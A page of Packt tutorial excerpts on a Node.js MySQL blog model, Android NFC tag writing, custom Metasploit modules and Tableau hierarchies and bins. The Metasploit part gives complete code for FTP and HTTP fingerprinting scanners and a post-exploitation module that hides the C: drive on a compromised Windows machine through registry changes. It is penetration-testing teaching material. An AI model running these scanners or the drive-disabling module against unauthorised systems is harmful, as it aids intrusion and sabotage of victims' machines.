To do so, we need to know the values of the host, username, and password fields and, because the data is organized into databases, the name of the database as well. In MySQL, we put our data into different databases. So, the following code defines the needed variables: var mysql = require('mysql'), mysql_host = "127.0.0.1", mysql_user = "root", mysql_password = "", mysql_database = "blog_application", connection; The previous example leaves the password field empty, but we should set the proper value for our system. The MySQL database requires us to define a table and its fields before we start saving data. So, consider the following code: CREATE TABLE IF NOT EXISTS `articles` ( `id` int(11) NOT NULL AUTO_INCREMENT, `title` longtext NOT NULL, `text` longtext NOT NULL, `date` varchar(100) NOT NULL, PRIMARY KEY (`id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 AUTO_INCREMENT=1 ; Once we have a database and its table set, we can continue with the database connection, as follows: connection = mysql.createConnection({ host: mysql_host, user: mysql_user, password: mysql_password }); connection.connect(function(err) { if(err) { throw new Error("Can't connect to MySQL."); } else { connection.query("USE " + mysql_database, function(err, rows, fields) { if(err) { throw new Error("Missing database."); } else { console.log("Successfully selected database."); } }) } }); The driver provides a method to connect to the server and execute queries. The first executed query selects the database. If everything is OK, you should see Successfully selected database as output in your console. Half of the job is done. What we should do now is replicate the methods returned in the first MongoDB implementation. We need to do this because otherwise, when we switch to MySQL, the code using the class will not work. By replicating them, we mean that they should have the same names and should accept the same arguments.
If we do everything correctly, at the end our application will support two types of databases. And all we have to do is change the value of the type variable: return { add: function(data, callback) { var date = new Date(); var query = ""; query += "INSERT INTO articles (title, text, date) VALUES ("; query += connection.escape(data.title) + ", "; query += connection.escape(data.text) + ", "; query += "'" + date.getFullYear() + "-" + (date.getMonth() + 1) + "-" + date.getDate() + "'"; query += ")"; connection.query(query, callback); }, update: function(data, callback) { var query = "UPDATE articles SET "; query += "title=" + connection.escape(data.title) + ", "; query += "text=" + connection.escape(data.text) + " "; query += "WHERE id=" + connection.escape(data.id); connection.query(query, callback); }, get: function(callback) { var query = "SELECT * FROM articles ORDER BY id DESC"; connection.query(query, function(err, rows, fields) { if(err) { throw new Error("Error getting."); } else { callback(rows); } }); }, remove: function(id, callback) { var query = "DELETE FROM articles WHERE id=" + connection.escape(id); connection.query(query, callback); } } The code is a little longer than the one in the first MongoDB variant. That's because we needed to construct MySQL queries from the passed data. Keep in mind that we have to escape all the information that comes into the module, including the id values used in the WHERE clauses; that's why we use connection.escape(). With these lines of code, our model is completed. Now we can add, edit, remove, or get data.

Summary

In this article, we saw how to select and initialize a database using NoSQL with MongoDB and using MySQL, as required for writing a blog application with Node.js and AngularJS.

Resources for Article:
Further resources on this subject:
So, what is Node.js? [Article]
Understanding and Developing Node Modules [Article]
An Overview of the Node Package Manager [Article]

Writing Tag Content

Packt
10 Jun 2014
9 min read
(For more resources related to this topic, see here.) The NDEF message is composed of one or more NDEF records, and each record contains the payload and a header in which the data length, type, and identifier are stored. In this article, we will create some examples that will allow us to work with the NDEF standard and start writing NFC applications.

Working with the NDEF record

Android provides an easy way to read and write data when it is formatted as per the NDEF standard. This format is the easiest way for us to work with tag data because it saves us from performing lots of operations and processes of reading and writing raw bytes. So, unless we need to get our hands dirty and write our own protocol, this is the way to go (you can still build it on top of NDEF and achieve a custom, yet standard-based protocol).

Getting ready

Make sure you have a working Android development environment. If you don't, ADT Bundle is a good environment to start with (you can access it by navigating to http://developer.android.com/sdk/index.html). Make sure you have an NFC-enabled Android device or a virtual test environment. It will be assumed that Eclipse is the development IDE.

How to do it...

We are going to create an application that writes any NDEF record to a tag by performing the following steps: Open Eclipse and create a new Android application project named NfcBookCh3Example1 with the package name nfcbook.ch3.example1. Make sure the AndroidManifest.xml file is correctly configured.
Open the MainActivity.java file located under com.nfcbook.ch3.example1 and add the following class member:

private NfcAdapter nfcAdapter;

Implement the enableForegroundDispatch method, which filters tags by using Ndef and NdefFormatable, and invoke it in the onResume method:

private void enableForegroundDispatch() {
  Intent intent = new Intent(this, MainActivity.class).addFlags(Intent.FLAG_RECEIVER_REPLACE_PENDING);
  PendingIntent pendingIntent = PendingIntent.getActivity(this, 0, intent, 0);
  IntentFilter[] intentFilter = new IntentFilter[] {};
  String[][] techList = new String[][] {
    { android.nfc.tech.Ndef.class.getName() },
    { android.nfc.tech.NdefFormatable.class.getName() }
  };
  if (Build.DEVICE.matches(".*generic.*")) {
    // clean up the tech filter when in the emulator since it doesn't work properly
    techList = null;
  }
  nfcAdapter.enableForegroundDispatch(this, pendingIntent, intentFilter, techList);
}

Instantiate the nfcAdapter class field in the onCreate method:

protected void onCreate(Bundle savedInstanceState) {
  ...
  nfcAdapter = NfcAdapter.getDefaultAdapter(this);
}

Implement the formatTag method:

private boolean formatTag(Tag tag, NdefMessage ndefMessage) {
  try {
    NdefFormatable ndefFormat = NdefFormatable.get(tag);
    if (ndefFormat != null) {
      ndefFormat.connect();
      ndefFormat.format(ndefMessage);
      ndefFormat.close();
      return true;
    }
  } catch (Exception e) {
    Log.e("formatTag", e.getMessage());
  }
  return false;
}

Implement the writeNdefMessage method:

private boolean writeNdefMessage(Tag tag, NdefMessage ndefMessage) {
  try {
    if (tag != null) {
      Ndef ndef = Ndef.get(tag);
      if (ndef == null) {
        return formatTag(tag, ndefMessage);
      } else {
        ndef.connect();
        if (ndef.isWritable()) {
          ndef.writeNdefMessage(ndefMessage);
          ndef.close();
          return true;
        }
        ndef.close();
      }
    }
  } catch (Exception e) {
    Log.e("writeNdefMessage", e.getMessage());
  }
  return false;
}

Implement the isNfcIntent method:

boolean isNfcIntent(Intent intent) {
  return intent.hasExtra(NfcAdapter.EXTRA_TAG);
}

Override the onNewIntent method using the following code:

@Override
protected void onNewIntent(Intent intent) {
  try {
    if (isNfcIntent(intent)) {
      NdefRecord ndefEmptyRecord = new NdefRecord(NdefRecord.TNF_EMPTY, new byte[]{}, new byte[]{}, new byte[]{});
      NdefMessage ndefMessage = new NdefMessage(new NdefRecord[] { ndefEmptyRecord });
      Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
      if (writeNdefMessage(tag, ndefMessage)) {
        Toast.makeText(this, "Tag written!", Toast.LENGTH_SHORT).show();
      } else {
        Toast.makeText(this, "Failed to write tag", Toast.LENGTH_SHORT).show();
      }
    }
  } catch (Exception e) {
    Log.e("onNewIntent", e.getMessage());
  }
}

Override the onPause method and insert the following code:

@Override
protected void onPause() {
  super.onPause();
  nfcAdapter.disableForegroundDispatch(this);
}

Open the NFC Simulator tool and simulate a few tags.
The tag should be marked as modified, as shown in the following screenshot:

In the NFC Simulator, a tag name that ends with _LOCKED is not writable, so we won't be able to write any content to the tag and, therefore, a Failed to write tag toast will appear.

How it works...

NFC intents carry an extra value with them that is a virtual representation of the tag and can be obtained using the NfcAdapter.EXTRA_TAG key. We can get information about the tag, such as the tag ID and its content type, through this object. In the onNewIntent method, we retrieve the tag instance and then use other classes provided by Android to easily read, write, and retrieve even more information about the tag. These classes are as follows:

- android.nfc.tech.Ndef: This class provides methods to retrieve and modify the NdefMessage object on a tag
- android.nfc.tech.NdefFormatable: This class provides methods to format tags that are capable of being formatted as NDEF

The first thing we need to do while writing a tag is to call the get(Tag tag) method from the Ndef class, which will return an instance of the same class. Then, we need to open a connection with the tag by calling the connect() method. With an open connection, we can now write an NDEF message to the tag by calling the writeNdefMessage(NdefMessage msg) method. Checking whether the tag is writable or not is always a good practice to prevent unwanted exceptions. We can do this by calling the isWritable() method. Note that this method may not account for physical write protection. When everything is done, we call the close() method to release the previously opened connection.

If the get(Tag tag) method returns null, it means that the tag is not formatted as per the NDEF format, and we should try to format it correctly. For formatting a tag with the NDEF format, we use the NdefFormatable class in the same way as we did with the Ndef class. However, in this case, we want to format the tag and write a message.
This is achieved by calling the format(NdefMessage firstMessage) method. So, we should call the get(Tag tag) method, then open a connection by calling connect(), and format the tag and write the message by calling the format(NdefMessage firstMessage) method. Finally, close the connection with the close() method. If NdefFormatable's get(Tag tag) method returns null, it means that the Android NFC API cannot automatically format the tag to NDEF.

An NDEF message is composed of several NDEF records. Each of these records is composed of four key properties:

- Type Name Format (TNF): This property defines how the type field should be interpreted
- Record Type Definition (RTD): This property is used together with the TNF to help Android create the correct NDEF message and trigger the corresponding intent
- Id: This property lets you define a custom identifier for the record
- Payload: This property contains the content that will be transported in the record

Using combinations of the TNF and the RTD, we can create several different NDEF records to hold our data and even create our own custom types. In this recipe, we created an empty record.

The main TNF property values of a record are as follows:

- TNF_ABSOLUTE_URI: This is a URI-type field
- TNF_WELL_KNOWN: This is an NFC Forum-defined URN
- TNF_EXTERNAL_TYPE: This is a URN-type field
- TNF_MIME_MEDIA: This is a MIME type based on the type specified

The main RTD property values of a record are:

- RTD_URI: This is the URI based on the payload
- RTD_TEXT: This is the NFC Forum-defined record type

Writing a URI-formatted record

A URI is probably the most common content written to NFC tags. It allows you to share a website, an online service, or a link to online content. This can be used, for example, in advertising and marketing.

How to do it...

We are going to create an application that writes URI records to a tag by performing the following steps. The URI will be hardcoded and will point to the Packt Publishing website.
Open Eclipse and create a new Android application project named NfcBookCh3Example2. Make sure the AndroidManifest.xml file is configured correctly. Set the minimum SDK version to 14:

<uses-sdk android:minSdkVersion="14" />

Implement the enableForegroundDispatch, isNfcIntent, formatTag, and writeNdefMessage methods from the previous recipe—steps 2, 4, 6, and 7.

Add the following class member and instantiate it in the onCreate method:

private NfcAdapter nfcAdapter;

protected void onCreate(Bundle savedInstanceState) {
  ...
  nfcAdapter = NfcAdapter.getDefaultAdapter(this);
}

Override the onNewIntent method and place the following code:

@Override
protected void onNewIntent(Intent intent) {
  try {
    if (isNfcIntent(intent)) {
      NdefRecord uriRecord = NdefRecord.createUri("http://www.packtpub.com");
      NdefMessage ndefMessage = new NdefMessage(new NdefRecord[] { uriRecord });
      Tag tag = intent.getParcelableExtra(NfcAdapter.EXTRA_TAG);
      boolean writeResult = writeNdefMessage(tag, ndefMessage);
      if (writeResult) {
        Toast.makeText(this, "Tag written!", Toast.LENGTH_SHORT).show();
      } else {
        Toast.makeText(this, "Tag write failed!", Toast.LENGTH_SHORT).show();
      }
    }
  } catch (Exception e) {
    Log.e("onNewIntent", e.getMessage());
  }
  super.onNewIntent(intent);
}

Run the application. Tap a tag on your phone or simulate a tap in the NFC Simulator. A Tag written! toast should appear.

How it works...

URIs are perfect content for NFC tags because, with a relatively small amount of content, we can send users to richer and more complete resources. These types of records are the easiest to create, which is done by calling the NdefRecord.createUri method and passing the URI as the first parameter. URIs are not necessarily URLs for a website. We can use other URIs that are quite well known in Android, such as the following:

- tel:+000 000 000 000
- sms:+000 000 000 000

If we write the tel: URI syntax, the user will be prompted to initiate a phone call.
We can always create a URI record the hard way, without using the createUri method:

public NdefRecord createUriRecord(String uri) {
  NdefRecord rtdUriRecord = null;
  try {
    byte[] uriField;
    uriField = uri.getBytes("UTF-8");
    byte[] payload = new byte[uriField.length + 1]; // +1 for the URI prefix
    payload[0] = 0x00; // prefixes the URI
    System.arraycopy(uriField, 0, payload, 1, uriField.length);
    rtdUriRecord = new NdefRecord(NdefRecord.TNF_WELL_KNOWN, NdefRecord.RTD_URI, new byte[0], payload);
  } catch (UnsupportedEncodingException e) {
    Log.e("createUriRecord", e.getMessage());
  }
  return rtdUriRecord;
}

The first byte in the payload indicates which prefix should be used with the URI. This way, we don't need to write the whole URI to the tag, which saves some tag space. The following list describes the recognized prefixes:

- 0x00: No prepending is done
- 0x01: http://www.
- 0x02: https://www.
- 0x03: http://
- 0x04: https://
- 0x05: tel:
- 0x06: mailto:
- 0x07: ftp://anonymous:anonymous@
- 0x08: ftp://ftp.
- 0x09: ftps://
- 0x0A: sftp://
- 0x0B: smb://
- 0x0C: nfs://
- 0x0D: ftp://
- 0x0E: dav://
- 0x0F: news:
- 0x10: telnet://
- 0x11: imap:
- 0x12: rtsp://
- 0x13: urn:
- 0x14: pop:
- 0x15: sip:
- 0x16: sips:
- 0x17: tftp:
- 0x18: btspp://
- 0x19: btl2cap://
- 0x1A: btgoep://
- 0x1B: tcpobex://
- 0x1C: irdaobex://
- 0x1D: file://
- 0x1E: urn:epc:id:
- 0x1F: urn:epc:tag:
- 0x20: urn:epc:pat:
- 0x21: urn:epc:raw:
- 0x22: urn:epc:
- 0x23: urn:nfc:
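The prefix table above can be exercised outside Android. The following plain-Java sketch (the class name and the truncated prefix subset are our own, for illustration) encodes a URI into a prefixed payload, as createUriRecord does, and decodes it back:

```java
import java.nio.charset.StandardCharsets;

public class UriRecordCodec {
    // A subset of the NFC Forum URI prefix table listed above (codes 0x00-0x06).
    private static final String[] PREFIXES = {
        "", "http://www.", "https://www.", "http://", "https://", "tel:", "mailto:"
    };

    // Encode: pick the longest matching prefix and store its code in byte 0.
    public static byte[] encode(String uri) {
        int best = 0;
        for (int code = 1; code < PREFIXES.length; code++) {
            if (uri.startsWith(PREFIXES[code])
                    && PREFIXES[code].length() > PREFIXES[best].length()) {
                best = code;
            }
        }
        byte[] rest = uri.substring(PREFIXES[best].length())
                         .getBytes(StandardCharsets.UTF_8);
        byte[] payload = new byte[rest.length + 1];
        payload[0] = (byte) best; // 0x00 means "no prepending is done"
        System.arraycopy(rest, 0, payload, 1, rest.length);
        return payload;
    }

    // Decode: expand the prefix byte back into the full URI string.
    public static String decode(byte[] payload) {
        int code = payload[0] & 0xFF;
        String prefix = (code < PREFIXES.length) ? PREFIXES[code] : "";
        return prefix + new String(payload, 1, payload.length - 1, StandardCharsets.UTF_8);
    }

    public static void main(String[] args) {
        byte[] p = encode("http://www.packtpub.com");
        System.out.println(p[0]);      // prefix code 1, that is, "http://www."
        System.out.println(decode(p)); // the full URI, reconstructed
    }
}
```

Note the longest-match rule: without it, "http://www.packtpub.com" would match the shorter http:// prefix (0x03) instead of the more space-efficient http://www. (0x01).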

Packt
03 Jun 2014
10 min read

Metasploit Custom Modules and Meterpreter Scripting

(For more resources related to this topic, see here.)

Writing out a custom FTP scanner module

Let's try and build a simple module. We will write a simple FTP fingerprinting module and see how things work. Let's examine the code for the FTP module:

require 'msf/core'
class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::Ftp
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Apex FTP Detector',
      'Description' => '1.0',
      'Author' => 'Nipun Jaswal',
      'License' => MSF_LICENSE
    )
    register_options(
      [
        Opt::RPORT(21),
      ], self.class)
  end

We start our code by defining the required libraries to refer to. We define the statement require 'msf/core' to include the path to the core libraries at the very first step. Then, we define what kind of module we are creating; in this case, we are writing an auxiliary module exactly the way we did for the previous module. Next, we define the library files we need to include from the core library set. Here, the include Msf::Exploit::Remote::Ftp statement refers to the /lib/msf/core/exploit/ftp.rb file and include Msf::Auxiliary::Scanner refers to the /lib/msf/core/auxiliary/scanner.rb file. We have already discussed the scanner.rb file in detail in the previous example. However, the ftp.rb file contains all the necessary methods related to FTP, such as methods for setting up a connection, logging in to the FTP service, sending an FTP command, and so on. Next, we define the information of the module we are writing and attributes such as name, description, author name, and license in the initialize method. We also define what options are required for the module to work. For example, here we assign RPORT to port 21 by default.
Let's continue with the remaining part of the module:

  def run_host(target_host)
    connect(true, false)
    if(banner)
      print_status("#{rhost} is running #{banner}")
    end
    disconnect
  end
end

We define the run_host method, which will initiate the process of connecting to the target by overriding the run_host method from the /lib/msf/core/auxiliary/scanner.rb file. Similarly, we use the connect function from the /lib/msf/core/exploit/ftp.rb file, which is responsible for initializing a connection to the host. We supply two parameters to the connect function: true and false. The true parameter enables the use of global parameters, whereas false turns off the verbose capabilities of the module. The beauty of the connect function lies in its operation of connecting to the target and automatically recording the banner of the FTP service in the parameter named banner, as shown in the following screenshot:

Now we know that the result is stored in the banner attribute. Therefore, we simply print out the banner at the end and disconnect from the target. This was an easy module, and I recommend that you try building simple scanners and other modules like these.

Nevertheless, before we run this module, let's check whether the module we just built is correct with regard to its syntax. We can do this by passing the module through an in-built Metasploit tool named msftidy, as shown in the following screenshot:

We will get a warning message indicating that there are a few extra spaces at the end of line number 19. Therefore, when we remove the extra spaces and rerun msftidy, we will see that no error is generated. This marks the syntax of the module as correct. Now, let's run this module and see what we gather:

We can see that the module ran successfully, and it has the banner of the service running on port 21, which is Baby FTP Server.
For further reading on the acceptance of modules in the Metasploit project, refer to https://github.com/rapid7/metasploit-framework/wiki/Guidelines-for-Accepting-Modules-and-Enhancements.

Writing out a custom HTTP server scanner

Now, let's take a step further into development and fabricate something a bit trickier. We will create a simple fingerprinter for HTTP services, but with a slightly more complex approach. We will name this file http_myscan.rb, as shown in the following code snippet:

require 'rex/proto/http'
require 'msf/core'

class Metasploit3 < Msf::Auxiliary
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name' => 'Server Service Detector',
      'Description' => 'Detects Service On Web Server, Uses GET to Pull Out Information',
      'Author' => 'Nipun_Jaswal',
      'License' => MSF_LICENSE
    )
  end

We include all the necessary library files as we did for the previous modules. We also assign general information about the module in the initialize method, as shown in the following code snippet:

  def os_fingerprint(response)
    if not response.headers.has_key?('Server')
      return "Unknown OS (No Server Header)"
    end
    case response.headers['Server']
    when /Win32/, /Windows/, /IIS/
      os = "Windows"
    when /Apache/
      os = "*Nix"
    else
      os = "Unknown Server Header Reporting: " + response.headers['Server']
    end
    return os
  end

  def pb_fingerprint(response)
    if not response.headers.has_key?('X-Powered-By')
      resp = "No-Response"
    else
      resp = response.headers['X-Powered-By']
    end
    return resp
  end

  def run_host(ip)
    connect
    res = send_request_raw({'uri' => '/', 'method' => 'GET' })
    return if not res
    os_info = os_fingerprint(res)
    pb = pb_fingerprint(res)
    fp = http_fingerprint(res)
    print_status("#{ip}:#{rport} is running #{fp} version And Is Powered By: #{pb} Running On #{os_info}")
  end
end

The preceding module is similar to the one we discussed in the very first example. We have the run_host method here with ip as a parameter, which will open a connection to the host.
Next, we have send_request_raw, which will fetch the response from the website or web server at / with a GET request. The fetched result will be stored in the variable named res. We pass the value of the response in res to the os_fingerprint method. This method will check whether the response has the Server key in its header; if the Server key is not present, we will be presented with a message saying Unknown OS. However, if the response header has the Server key, we match it against a variety of values using regular expressions. If a match is made, the corresponding value of os is sent back to the calling definition, which is the os_info parameter.

Now, we will check which technology is running on the server. We will create a similar function, pb_fingerprint, but look for the X-Powered-By key rather than Server. Similarly, we will check whether this key is present in the response or not. If the key is not present, the method will return No-Response; if it is present, the value of X-Powered-By is returned to the calling method and gets stored in a variable, pb. Next, we use the http_fingerprint method that we used in the previous examples as well and store its result in a variable, fp. We simply print out the values returned from os_fingerprint, pb_fingerprint, and http_fingerprint using their corresponding variables. Let's see what output we'll get after running this module:

Msf auxiliary(http_myscan) > run
[*] 192.168.75.130:80 is running Microsoft-IIS/7.5 version And Is Powered By: ASP.NET Running On Windows
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Writing out post-exploitation modules

Now, as we have seen the basics of module building, we can take a step further and try to build a post-exploitation module. A point to remember here is that we can only run a post-exploitation module after a target has been compromised successfully.
So, let's begin with a simple drive disabler module, which will disable C: on the target system:

require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'

class Metasploit3 < Msf::Post
  include Msf::Post::Windows::Registry

  def initialize
    super(
      'Name' => 'Drive Disabler Module',
      'Description' => 'C Drive Disabler Module',
      'License' => MSF_LICENSE,
      'Author' => 'Nipun Jaswal'
    )
  end

We started in the same way as we did in the previous modules. We have added the path to all the required libraries we need in this post-exploitation module. However, we have added include Msf::Post::Windows::Registry on the 5th line of the preceding code, which refers to the /core/post/windows/registry.rb file. This will give us the power to use registry manipulation functions with ease using Ruby mixins. Next, we define the type of module and the intended version of Metasploit. In this case, it is Post for post-exploitation and Metasploit3 is the intended version. We include the same file again because this is a single file and not a separate directory. Next, we define the necessary information about the module in the initialize method just as we did for the previous modules. Let's see the remaining part of the module:

  def run
    key1 = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\"
    print_line("Disabling C Drive")
    meterpreter_registry_setvaldata(key1, 'NoDrives', '4', 'REG_DWORD')
    print_line("Setting No Drives For C")
    meterpreter_registry_setvaldata(key1, 'NoViewOnDrives', '4', 'REG_DWORD')
    print_line("Removing View On The Drive")
    print_line("Disabled C Drive")
  end
end #class

We created a variable called key1, and we stored in it the path of the registry where we need to create values to disable the drives. As we are in a meterpreter shell after the exploitation has taken place, we will use the meterpreter_registry_setvaldata function from the /core/post/windows/registry.rb file to create a registry value at the path defined by key1.
This operation will create a new registry key named NoDrives of the REG_DWORD type at the path defined by key1. However, you might be wondering why we have supplied 4 as the bitmask. To calculate the bitmask for a particular drive, we have a little formula: 2^([drive character serial number] - 1). Suppose we need to disable the C drive. We know that C is the third letter of the alphabet. Therefore, we can calculate the exact bitmask value for disabling the C drive as follows:

2^(3-1) = 2^2 = 4

Therefore, the bitmask is 4 for disabling C:. We also created another key, NoViewOnDrives, to disable the view of these drives with the exact same parameters. Now, when we run this module, it gives the following output:

So, let's see whether we have successfully disabled C: or not:

Bingo! No C:. We successfully disabled C: from the user's view. Therefore, we can create as many post-exploitation modules as we want according to our needs. I recommend you put some extra time toward the libraries of Metasploit. Make sure you have user-level access rather than SYSTEM for the preceding script to work, as SYSTEM privileges will not create the registry under HKCU. In addition to this, we have used HKCU instead of writing HKEY_CURRENT_USER because of the inbuilt normalization that will automatically create the full form of the key. I recommend you check the registry.rb file to see the various available methods.
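The bitmask formula generalizes beyond C:. As a quick sanity check outside Metasploit (this helper is our own illustration, not part of the module), the mask for any set of drive letters is just the sum of the individual 2^(position - 1) terms:

```ruby
# Compute the NoDrives-style bitmask for a set of drive letters,
# using the 2^([drive character serial number] - 1) formula above.
def drive_bitmask(*letters)
  letters.map { |letter| 2 ** (letter.upcase.ord - 'A'.ord) }.sum
end

puts drive_bitmask('C')       # => 4, matching the recipe's calculation
puts drive_bitmask('A', 'C')  # => 5, hides both A: and C: at once
```

Summing the terms means a single NoDrives value can hide any combination of the 26 possible drives.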
Packt
23 May 2014
11 min read

Interacting with Data for Dashboards

(For more resources related to this topic, see here.) Hierarchies for revealing the dashboard message It can become difficult to manage data, particularly if you have many columns. It can become more difficult if they are similarly named too. As you'd expect, Tableau helps you to organize your data so that it is easier to navigate and keep track of everything. From the user perspective, hierarchies improve navigation and use by allowing the users to navigate from a headline down to a detailed level. From the Tableau perspective, hierarchies are groups of columns that are arranged in increasing levels of granularity. Each deeper level of the hierarchy refers to more specific details of the data. Some hierarchies are natural hierarchies, such as date. So, say Tableau works out that a column is a date and automatically adds in a hierarchy in this order: year, quarter, month, week, and date. You have seen this already, for example, when you dragged a date across to the Columns shelf, Tableau automatically turned the date into a year. Some hierarchies are not always immediately visible. These hierarchies would need to be set up, and we will look at setting up a product hierarchy that straddles across different tables. This is a nice feature because it means that the hierarchy can reflect the users' understanding of the data and isn't determined only by the underlying data. Getting ready In this article, we will use the existing workbook that you created for this article. We will use the same data. For this article, let's take a copy of the existing worksheet and call it Hierarchies. To do this, right-click on the Worksheet tab and select the Duplicate Sheet option. You can then rename the sheet to Hierarchies. How to do it... Navigate to the DimProductCategory dimension and right-click on the EnglishProductCategoryName attribute. From the pop-up menu, select the Create Hierarchy feature. 
You can see its location in the following illustration: When you select the option, you will get a textbox entitled Create Hierarchy, which will ask you to specify the name of the hierarchy. We will call our hierarchy Product Category. Once you have entered this into the textbox, click on OK. Your hierarchy will now be created, and it will appear at the bottom of the Dimensions list on the left-hand side of Tableau's interface. Next, go to the DimProductSubcategory dimension and look for the EnglishProductSubCategoryName attribute. Drag it to the Product Category hierarchy under EnglishProductCategoryName, which is already part of the Product Category hierarchy. Now we will add the EnglishProductName attribute, which we will find under the DimProduct dimension. Drag-and-drop it under the EnglishProductSubCategoryName attribute that is already under the Product Category hierarchy. The Product Category hierarchy should now look as follows: The Product Category hierarchy will be easier to understand if we rename the attributes. To do this, right-click on each attribute and choose Rename. Change EnglishProductCategoryName to Product Category. Rename EnglishProductSubcategoryName to Product Subcategory by right-clicking on the attribute and selecting Rename. Rename EnglishProductName to Product. Once you have done this, the hierarchy should look as follows: You can now use your hierarchy to change the details that you wish to see in the data visualization. Now, we will use Product Category of our data visualization rather than Dimension. Remove everything from the Rows shelf and drag the Product Category hierarchy to the Rows shelf. Then, click on the plus sign; it will open the hierarchy, and you will see data for the next level under Product Category, which are subcategories. An example of the Tableau workbook is given in the following illustration. 
You can see that the biggest differences occurred in the Bikes product category, and they occurred in the years 2006 and 2007 for the Mountain Bikes and Road Bikes categories. To summarize, we have used the Hierarchy feature in Tableau to vary the degree of analysis we see in the dashboard. How it works… Tableau saves the additional information as part of the Tableau workbook. When you share the workbook, the hierarchies will be preserved. The Tableau workbook would need revisions if the hierarchy is changed, or if you add in new dimensions and they need to be maintained. Therefore, they may need some additional maintenance. However, they are very useful features and worth the little extra touch they offer in order to help the dashboard user. There's more... Dashboarding data usually involves providing "at a glance" information for team members to clearly see the issues in the data and to make actionable decisions. Often, we don't need to provide further information unless we are asked for it, and it is a very useful feature that will help us answer more detailed questions. It saves us space on the page and is a very useful dashboard feature. Let's take the example of a business meeting where the CEO wants to know more about the biggest differences or "swings" in the sales amount by category, and then wants more details. The Tableau analyst can quickly place a hierarchy in order to answer more detailed questions if required, and this is done quite simply as described here. Hierarchies also allow us to encapsulate business rules into the dashboard. In this article, we used product hierarchies. We could also add in hierarchies for different calendars, for example, in order to reflect different reporting periods. This will allow the dashboard to be easily reused in order to reflect different reporting calendars, say, you want to show data according to a fiscal year or a calendar year. 
You could have two different hierarchies: one for fiscal and the other for the calendar year. The dashboard could contain the same measures but sliced by different calendars according to user requirements. The hierarchies feature fits nicely with the Golden Mantra of Information Visualization, since it allows us to summarize the data and then drill down into it as the next step. See also http://www.tableausoftware.com/about/blog/2013/4/lets-talk-about-sets-23043 Classifying your data for dashboards Bins are a simple way of categorizing and bucketing values, depending on the measure value. So, for example, you could "bin" customers depending on their age group or the number of cars that they own. Bins are useful for dashboards because they offer a summary view of the data, which is essential for the "at a glance" function of dashboards. Tableau can create bins automatically, or we can also set up bins manually using calculated fields. This article will show both versions in order to meet the business needs. Getting ready In this article, we will use the existing workbook that you created for this article. We will use the same data. For this article, let's take a copy of the Hierarchies worksheet and by right-clicking on the Worksheet tab, select the Duplicate Sheet option. You can then rename the sheet to Bins. How to do it... Once you have your Bins worksheet in place, right-click on the SalesAmount measure and select the Create Bin option. You can see an example of this in the following screenshot: We will change the value to 5. Once you've done this, press the Load button to reveal the Min, Max, and Diff values of the data, as shown in the following screenshot: When you click on the OK button, you will see a bin appear under the Dimensions area. The following is an example of this: Let's test out our bins! To do this, remove everything from the Rows shelf, leaving only the Product Category hierarchy. 
Remove any filters from the worksheet and all of the calculations in the Marks shelf. Next, drag SalesAmount (bin) to the Marks area under the Detail and Tooltip buttons. Once again, take SalesAmount (bin) and drag it to the Color button on the Marks shelf. Now, we will change the size of the data points to reflect the size of the elements. To do this, drag SalesAmount (bin) to the Size button. You can vary the overall size of the elements by right-clicking on the Size button and moving the slider horizontally so that you can get your preferred size. To neaten the image, right-click on the Date column heading and select Hide Field Names for Columns from the list. The Tableau worksheet should now look as follows: This allows us to see some patterns in the data. We can also see more details if we click on the data points; you can see an illustration of the details in the data in the following screenshot: However, we might find that the automated bins are not very clear to business users. We can see in the previous screenshot that the SalesAmount(bin) value is £2,440.00. This may not be meaningful to business users. How can we set the bins so that they are meaningful to business users, rather than being automated by Tableau? For example, what if the business team wants to know about the proportion of their sales that fell into well-defined buckets, sliced by years? Fortunately, we can emulate the same behavior as in bins by simply using a calculated field. We can create a very simple IF… THEN ... ELSEIF formula that will place the sales amounts into buckets, depending on the value of the sales amount. These buckets are manually defined using a calculated field, and we will see how to do this now. Before we begin, take a copy of the existing worksheet called Bins and rename it to Bins Set Manually. To do this, right-click on the Sales Amount metric and choose the Create Calculated Field option. 
In the calculated field, enter the following formula:

IF [SalesAmount] <= 1000 THEN "1000"
ELSEIF [SalesAmount] <= 2000 THEN "2000"
ELSEIF [SalesAmount] <= 3000 THEN "3000"
ELSEIF [SalesAmount] <= 4000 THEN "4000"
ELSEIF [SalesAmount] <= 5000 THEN "5000"
ELSEIF [SalesAmount] <= 6000 THEN "6000"
ELSE "7000"
END

When this formula is entered into the Calculated Field window, it looks like what the following screenshot shows. Rename the calculated field to SalesAmount Buckets.

Now that we have our calculated field in place, we can use it in our Tableau worksheet to create a dashboard component. On the Columns shelf, place the SalesAmount Buckets calculated field and the Year(Date) dimension attribute. On the Rows shelf, place Sum(SalesAmount) from the Measures section. Place the Product Category hierarchy on the Color button. Drag SalesAmount Buckets from the Dimensions pane to the Size button on the Marks shelf. Go to the Show Me panel and select the Circle View option. This will provide a dot plot feel to the data visualization. You can resize the chart by hovering the mouse over the foot of the y axis where the £0.00 value is located. Once you're done with this, drag-and-drop the activities. The Tableau worksheet will look as it appears in the following screenshot:

To summarize, we have created bins using Tableau's automatic bin feature. We have also looked at ways of manually creating bins using the Calculated Field feature.

How it works...

Bins are constructed using a default Bins feature in Tableau, and we can use Calculated Fields in order to make them more useful and complex. They are stored in the Tableau workbook, so you will be able to preserve your work if you send it to someone else. In this article, we have also looked at dot plot visualization, which is a very simple way of representing data that does not use a lot of "ink". The data/ink ratio is useful to simplify a data visualization in order to get the message of the data across very clearly.
Dot plots might be considered old fashioned, but they are very effective and are perhaps underused. We can see from the screenshot that the 3000 bucket contained the highest sales amount. We can also see that this figure peaks in the year 2007 and then falls in 2008. This is a dashboard element that could be used as a start for further analysis. For example, business users will want to know the reason for the fall in sales for the highest occurring "bin".

See also

The Visual Display of Quantitative Information, Edward Tufte, Graphics Press USA

Packt
23 May 2014
10 min read

3D Websites

(For more resources related to this topic, see here.)

Creating engaging scenes

